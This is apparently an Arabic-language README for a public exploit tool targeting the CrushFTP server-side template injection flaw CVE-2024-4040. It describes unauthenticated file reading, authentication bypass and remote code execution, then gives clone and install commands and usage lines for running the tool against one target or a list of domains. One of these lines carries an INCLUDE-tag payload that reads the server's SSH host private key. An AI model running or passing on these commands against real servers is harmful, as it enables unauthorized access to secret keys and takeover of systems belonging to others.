
استغلال لثغرة SSTI في CrushFTP (CVE-2024-4040) تتيح قراءة الملفات غير المصادق عليها، وتجاوز المصادقة، وتنفيذ التعليمات البرمجية عن بُعد على الخوادم المتأثرة.
ثغرة أمنية من نوع حقن القوالب من جانب الخادم (Server Side Template Injection) في CrushFTP في جميع الإصدارات قبل 10.7.1 و11.1.0 على جميع المنصات، تسمح للمهاجمين عن بُعد غير الموثَقين بقراءة الملفات من نظام الملفات خارج صندوق حماية VFS، وتجاوز المصادقة للحصول على صلاحيات إدارية، وتنفيذ أكواد عن بُعد على الخادم.
git clone https://github.com/gotr00t0day/CVE-2024-4040.git
cd CVE-2024-4040
pip3 instrall -r requirements.txt
usage: CVE-2024-4040.py [-h] [-t TARGET] [-f FILE] [-d DOMAINS]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target to scan
-f FILE, --file FILE file to fetch
-d DOMAINS, --domains DOMAINS
file containing list of domains
# MAKE SURE YOU USE THE <INCLUDE> TAG OR ANY OTHER TAG TO EXPLOIT THE TARGET, SOMETIMES YOU DONT NEED ANY TAGS.
# Exploit a target
python3 CVE-2024-4040.py -t http://TARGET:8080 -f "<INCLUDE>ssh_host_rsa_key</INCLUDE>"
# Exploit a list of targets
python3 CVE-2024-4040.py -d ~/list.txt -f %hostname%
يرجى قراءة تحليل ATTACKERKB لفهم أفضل لكيفية استخدام هذه الأداة الاستغلالية.